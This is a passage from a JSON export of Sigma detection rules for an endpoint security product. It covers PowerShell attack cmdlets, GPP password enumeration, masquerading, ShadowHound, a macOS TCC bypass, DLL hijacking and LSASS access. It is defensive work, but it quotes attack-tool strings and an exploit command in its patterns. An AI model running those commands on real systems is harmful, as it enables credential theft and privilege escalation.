'JbnZva2UtRG9tYWluUGFzc3dvcmRTcHJhe'\n # Invoke-SpraySinglePassword\n - 'Invoke-SpraySinglePassword'\n - 'SW52b2tlLVNwcmF5U2luZ2xlUGFzc3dvcm'\n - 'ludm9rZS1TcHJheVNpbmdsZVBhc3N3b3Jk'\n - 'JbnZva2UtU3ByYXlTaW5nbGVQYXNzd29yZ'\n\n exclusion_tsmanager:\n # C:\\Windows\\CCM\\TSManager.exe\n - ParentCommandLine:\n - '*smsswd.exe*/run:*powershell*Invoke-WmiMethod -Namespace root\\CCM -Class SMS_Client -Name SetClientProvisioningMode -ArgumentList $false}*'\n - '*smsswd.exe*/run:*powershell*Invoke-WmiMethod -Namespace root\\CCM -Class SMS_Client -Name TriggerSchedule*{00000000-0000-0000-0000-000000000001}*'\n - ProcessAncestors|contains: '?:\\Windows\\CCM\\TSManager.exe'\n - CommandLine|contains:\n - ' -Class sms_client -Name TriggerSchedule {00000000-0000-0000-0000-000000000021}'\n - \" -Class SMS_Client -Name TriggerSchedule '{00000000-0000-0000-0000-000000000021}'\"\n\n exclusion_configmgr:\n CommandLine:\n - '*Powershell.exe Invoke-WmiMethod -Namespace root\\CCM -Class SMS_Client -Name SetClientProvisioningMode -ArgumentList $false'\n - '*powershell.exe Invoke-WmiMethod -Namespace root\\CCM -Class SMS_Client -Name SetClientProvisioningMode -ArgumentList False'\n\n exclusion_ltsvc:\n CommandLine: 'powershell.exe -command & {(invoke-wmimethod -path ((get-wmiobject -class win32_volume -filter \"name=??:\\\\\\\\?\").__PATH) -name defraganalysis).defraganalysis}'\n ParentImage: '?:\\Windows\\LTSvc\\LTSVC.exe'\n\n # Veritas malware scanning utility: https://www.veritas.com/support/en_US/article.100053050\n exclusion_veritas:\n CommandLine: '?:\\windows\\system32\\cmd.exe /c powershell.exe (Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList \"?:\\malware*\\nbmalwareutil.exe *\").ProcessId'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e0fe5da5-765a-4b7d-9af5-6b711030daa3",
"rule_name": "Malicious PowerShell Commandlets in Command-line",
"rule_description": "Detects various malicious commandlets in PowerShell's command-line, generally associated with online repositories containing attack codes to perform memory-only attacks.\nAttackers may use various PowerShell frameworks as they are easily installed and offer a very large panel of interactive functionnalities.\nIt is recommended to analyze the executed PowerShell script as well as the ancestors of the host process to determine whether this action is legitimate.\n",
"rule_creation_date": "2021-03-05",
"rule_modified_date": "2026-02-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1125",
"attack.t1562.001",
"attack.t1562.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e178bd0c-a726-4ff0-9d5e-5269ca43c04b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626315Z",
"creation_date": "2026-03-23T11:45:34.626317Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626321Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.mindpointgroup.com/blog/privilege-escalation-via-group-policy-preferences-gpp",
"https://obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html",
"https://github.com/nettitude/PoshC2/blob/master/resources/modules/PrivescCheck.ps1",
"https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70",
"https://attack.mitre.org/techniques/T1552/006/"
],
"name": "t1552_006_gpp_passwords_powershell.yml",
"content": "title: GPP Passwords in Sysvol Enumerated via PowerShell\nid: e178bd0c-a726-4ff0-9d5e-5269ca43c04b\ndescription: |\n Detects PowerShell commands that may be used to enumerate Group Policy Preferences (GPP) passwords.\n GPP allows for configuration of Domain-attached machines via group policy. Domain machines periodically authenticate to the Domain Controller utilizing the Domain credentials of the logged-in user. Group Policies for account management are stored on the Domain Controller in XML files in the SYSVOL folder.\n Policies that contain the \"cpassword\" field will set the password for the contained account. This field is encrypted with an AES 32-bit key, which is the same for all Windows systems and is publically available.\n Attackers may enumerate these files to acquire domain passwords for further lateral movement.\n It is recommended to investigate this activity and check the SYSVOL folder for any affected accounts, as well as to hunt for any authentications to affected accounts after this alert.\nreferences:\n - https://www.mindpointgroup.com/blog/privilege-escalation-via-group-policy-preferences-gpp\n - https://obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html\n - https://github.com/nettitude/PoshC2/blob/master/resources/modules/PrivescCheck.ps1\n - https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70\n - https://attack.mitre.org/techniques/T1552/006/\ndate: 2025/12/31\nmodified: 2026/01/07\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.006\n - attack.t1552.001\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n ScriptBlockText|contains: '.cpassword'\n\n exclusion_schtasks:\n ProcessParentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e178bd0c-a726-4ff0-9d5e-5269ca43c04b",
"rule_name": "GPP Passwords in Sysvol Enumerated via PowerShell",
"rule_description": "Detects PowerShell commands that may be used to enumerate Group Policy Preferences (GPP) passwords.\nGPP allows for configuration of Domain-attached machines via group policy. Domain machines periodically authenticate to the Domain Controller utilizing the Domain credentials of the logged-in user. Group Policies for account management are stored on the Domain Controller in XML files in the SYSVOL folder.\nPolicies that contain the \"cpassword\" field will set the password for the contained account. This field is encrypted with an AES 32-bit key, which is the same for all Windows systems and is publically available.\nAttackers may enumerate these files to acquire domain passwords for further lateral movement.\nIt is recommended to investigate this activity and check the SYSVOL folder for any affected accounts, as well as to hunt for any authentications to affected accounts after this alert.\n",
"rule_creation_date": "2025-12-31",
"rule_modified_date": "2026-01-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1552.001",
"attack.t1552.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e17a52d2-26d0-4183-a68c-db872a7939ec",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086528Z",
"creation_date": "2026-03-23T11:45:34.086530Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086534Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md#atomic-test-1---execute-a-process-from-a-directory-masquerading-as-the-current-parent-directory",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1036_005_match_legitimate_name_or_location.yml",
"content": "title: Parent Directory Masqueraded\nid: e17a52d2-26d0-4183-a68c-db872a7939ec\ndescription: |\n Detects a potential attempt to masquerade filenames or locations to match legitimate ones for the sake of evading defenses and observation.\n In this case, attackers can create a directory masquerading as the parent directory.\n It is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md#atomic-test-1---execute-a-process-from-a-directory-masquerading-as-the-current-parent-directory\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2022/12/26\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.Masquerading\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|contains: '/.../'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e17a52d2-26d0-4183-a68c-db872a7939ec",
"rule_name": "Parent Directory Masqueraded",
"rule_description": "Detects a potential attempt to masquerade filenames or locations to match legitimate ones for the sake of evading defenses and observation.\nIn this case, attackers can create a directory masquerading as the parent directory.\nIt is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\n",
"rule_creation_date": "2022-12-26",
"rule_modified_date": "2025-02-03",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e1adb17f-fb63-4bea-9ae9-71dd16550fbc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605225Z",
"creation_date": "2026-03-23T11:45:34.605229Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605236Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Friends-Security/ShadowHound",
"https://blog.fndsec.net/2024/11/25/shadowhound/",
"https://attack.mitre.org/techniques/T1018/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1018_shadowhound_execution.yml",
"content": "title: ShadowHound PowerShell Script Executed\nid: e1adb17f-fb63-4bea-9ae9-71dd16550fbc\ndescription: |\n Detects the usage of ShadowHound, a tool written in PowerShell that leverages native ADWS or LDAP features for Active Directory enumeration.\n This tool allows attackers to gather significant information about the Active Directory environment, possibly revealing hidden relationships to further perform attacks within the environment.\n It is recommended to analyze the execution context of the script to determine its legitimacy.\nreferences:\n - https://github.com/Friends-Security/ShadowHound\n - https://blog.fndsec.net/2024/11/25/shadowhound/\n - https://attack.mitre.org/techniques/T1018/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/11/26\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.discovery\n - attack.t1018\n - attack.t1482\n - attack.t1615\n - attack.t1201\n - attack.t1069.001\n - attack.t1069.002\n - attack.t1033\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.ShadowHound\n - classification.Windows.Behavior.Discovery\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection_ad_module:\n - PowershellScriptPath|endswith: '\\ShadowHound-ADM.ps1'\n - PowershellCommand|contains|all:\n - 'Process-AdObject'\n - 'Perform-ADQuery'\n - 'Get-TopLevelContainers'\n - 'Write-Output \"Objects have been processed and written to $OutputFilePath\"'\n - 'Write-Output \"[+] Found $($topLevelContainers.Count) top-level containers.\"'\n - \"Write-Output '[+] Executing with the following parameters:'\"\n - '$TopLevelContainers = Get-ADObject @topLevelParams '\n - '$objectClassMapping = @{'\n - 'Write-Output \"[*] Enumerating PKI objects under $configContext...\"'\n\n selection_ds_module:\n - PowershellScriptPath|endswith: '\\ShadowHound-DS.ps1'\n - PowershellCommand|contains|all:\n - 'Process-AdObject'\n - 'Write-Output \"Objects have been processed and written to $OutputFile\"'\n - \"Write-Output '[+] Executing with the following parameters:'\"\n - 'Write-Output \"[*] Enumerating PKI objects under $configContext...\"'\n - \"$rootDSE = New-Object System.DirectoryServices.DirectoryEntry('LDAP://RootDSE')\"\n - '$searcher = New-Object System.DirectoryServices.DirectorySearcher($directoryEntry)'\n - '$directoryEntry = New-Object System.DirectoryServices.DirectoryEntry($ldapPath, $Credential.UserName, $Credential.GetNetworkCredential().Password)'\n - 'Write-Output \" [!!] Error during search with filter $ldapFilter`: $_\"'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e1adb17f-fb63-4bea-9ae9-71dd16550fbc",
"rule_name": "ShadowHound PowerShell Script Executed",
"rule_description": "Detects the usage of ShadowHound, a tool written in PowerShell that leverages native ADWS or LDAP features for Active Directory enumeration.\nThis tool allows attackers to gather significant information about the Active Directory environment, possibly revealing hidden relationships to further perform attacks within the environment.\nIt is recommended to analyze the execution context of the script to determine its legitimacy.\n",
"rule_creation_date": "2024-11-26",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1033",
"attack.t1059.001",
"attack.t1069.001",
"attack.t1069.002",
"attack.t1201",
"attack.t1482",
"attack.t1615"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e1be9c6a-a1c4-43e8-8102-0de54255109a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086903Z",
"creation_date": "2026-03-23T11:45:34.086905Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086909Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://atomicredteam.io/defense-evasion/T1036.006/",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md#atomic-test-2---space-after-filename",
"https://attack.mitre.org/techniques/T1036/006/",
"https://attack.mitre.org/techniques/T1546/001/"
],
"name": "t1036_006_blank_space_filename.yml",
"content": "title: Suspicious Blank Space at the End of the Process Filename\nid: e1be9c6a-a1c4-43e8-8102-0de54255109a\ndescription: |\n Detects the execution of a file containing a space at the end of its filename.\n If a user double-clicks on a file ending with a space, for instance 'evil.txt ', the true file type is determined by the OS and handled appropriately and the binary will be executed.\n Adversaries can use this feature to trick users into double-clicking benign-looking files of any format and ultimately execute malicious payloads.\n Adversaries may also append a space after a filename to mimic a legitimate binary.\n It is recommended to analyze the executed file for malicious content.\nreferences:\n - https://atomicredteam.io/defense-evasion/T1036.006/\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md#atomic-test-2---space-after-filename\n - https://attack.mitre.org/techniques/T1036/006/\n - https://attack.mitre.org/techniques/T1546/001/\ndate: 2022/12/26\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.006\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1546.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Masquerading\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: ' '\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e1be9c6a-a1c4-43e8-8102-0de54255109a",
"rule_name": "Suspicious Blank Space at the End of the Process Filename",
"rule_description": "Detects the execution of a file containing a space at the end of its filename.\nIf a user double-clicks on a file ending with a space, for instance 'evil.txt ', the true file type is determined by the OS and handled appropriately and the binary will be executed.\nAdversaries can use this feature to trick users into double-clicking benign-looking files of any format and ultimately execute malicious payloads.\nAdversaries may also append a space after a filename to mimic a legitimate binary.\nIt is recommended to analyze the executed file for malicious content.\n",
"rule_creation_date": "2022-12-26",
"rule_modified_date": "2025-02-18",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1036.006",
"attack.t1546.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e1dea3fd-6b91-4170-a356-35ec98f63914",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619602Z",
"creation_date": "2026-03-23T11:45:34.619604Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619608Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9934",
"https://support.apple.com/HT211288",
"https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8",
"https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/"
],
"name": "cve_2020_9934_launchctl.yml",
"content": "title: TCC Daemon CVE-2020-9934 Exploited\nid: e1dea3fd-6b91-4170-a356-35ec98f63914\ndescription: |\n Detects the setting of an environment variable required to exploit CVE-2020-9934, which is related to the TCC daemon (tccd).\n TCC (Transparency, Consent, and Control) is a system present since the release of macOS Mojave (10.14) that protects access to some sensitive inputs such as screen captures, cameras, microphones and keyboard events.\n When an application tries to access certain functions, macOS prompts the user to ask whether the request from the application is legitimate, the user can then grant or refuse access to the application.\n Before macOS 10.15.6, the TCC daemon (tccd) is vulnerable to environment variable hijacking.\n By setting the HOME env variable on launchctl and restarting the tccd daemon, an attacker could take control of the TCC database and bypass Apple Gatekeeper entirely.\n It is recommended to verify if the parent process setting the environment variable has legitimate reasons to do so.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9934\n - https://support.apple.com/HT211288\n - https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8\n - https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/\ndate: 2023/07/11\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - attack.t1574\n - cve.2020-9934\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Exploit.CVE-2020-9934\n - classification.macOS.Exploit.TCC\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n product: macos\n category: process_creation\ndetection:\n # launchctl setenv HOME /tmp/tccbypass\n selection:\n Image: '/bin/launchctl'\n CommandLine|contains|all:\n - ' setenv'\n - ' HOME '\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e1dea3fd-6b91-4170-a356-35ec98f63914",
"rule_name": "TCC Daemon CVE-2020-9934 Exploited",
"rule_description": "Detects the setting of an environment variable required to exploit CVE-2020-9934, which is related to the TCC daemon (tccd).\nTCC (Transparency, Consent, and Control) is a system present since the release of macOS Mojave (10.14) that protects access to some sensitive inputs such as screen captures, cameras, microphones and keyboard events.\nWhen an application tries to access certain functions, macOS prompts the user to ask whether the request from the application is legitimate, the user can then grant or refuse access to the application.\nBefore macOS 10.15.6, the TCC daemon (tccd) is vulnerable to environment variable hijacking.\nBy setting the HOME env variable on launchctl and restarting the tccd daemon, an attacker could take control of the TCC database and bypass Apple Gatekeeper entirely.\nIt is recommended to verify if the parent process setting the environment variable has legitimate reasons to do so.\n",
"rule_creation_date": "2023-07-11",
"rule_modified_date": "2025-04-08",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1203",
"attack.t1574"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e241f72f-20e6-4482-bc91-6c4981c9abc0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090776Z",
"creation_date": "2026-03-23T11:45:34.090778Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090782Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ftp.yml",
"content": "title: DLL Hijacking via ftp.exe\nid: e241f72f-20e6-4482-bc91-6c4981c9abc0\ndescription: |\n Detects potential Windows DLL Hijacking via ftp.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ftp.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\mswsock.dll'\n - '\\napinsp.dll'\n - '\\nlansp_c.dll'\n - '\\pnrpnsp.dll'\n - '\\SspiCli.dll'\n - '\\winrnr.dll'\n - '\\wshbth.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e241f72f-20e6-4482-bc91-6c4981c9abc0",
"rule_name": "DLL Hijacking via ftp.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ftp.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e249ffec-7cb4-4b9d-97b1-fcfc3d1cd807",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093939Z",
"creation_date": "2026-03-23T11:45:34.093941Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093946Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/antonioCoco/MalSeclogon",
"https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html",
"https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_access_via_seclogon.yml",
"content": "title: LSASS Access via Secondary Logon Service\nid: e249ffec-7cb4-4b9d-97b1-fcfc3d1cd807\ndescription: |\n Detects process accesses to LSASS with suspicious access rights that involve \"seclogon.dll\" in the call trace.\n The SecLogon service can be used to obtain a handle to LSASS, allowing attackers to perform credential dumping while potentially evading common detection methods.\n This technique is implemented by the tool \"MalSeclogon\" for stealthy credential access.\n It is recommended to investigate the source process attempting to access LSASS, to verify if the access was legitimate, and to check for other attempts at credential theft.\nreferences:\n - https://github.com/antonioCoco/MalSeclogon\n - https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html\n - https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2024/11/05\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n SourceImage|endswith: '\\svchost.exe'\n ProcessCommandLine|endswith: '-s seclogon' # Secondary Logon Service process\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains|all:\n - PROCESS_QUERY_LIMITED_INFORMATION\n - PROCESS_QUERY_INFORMATION\n - 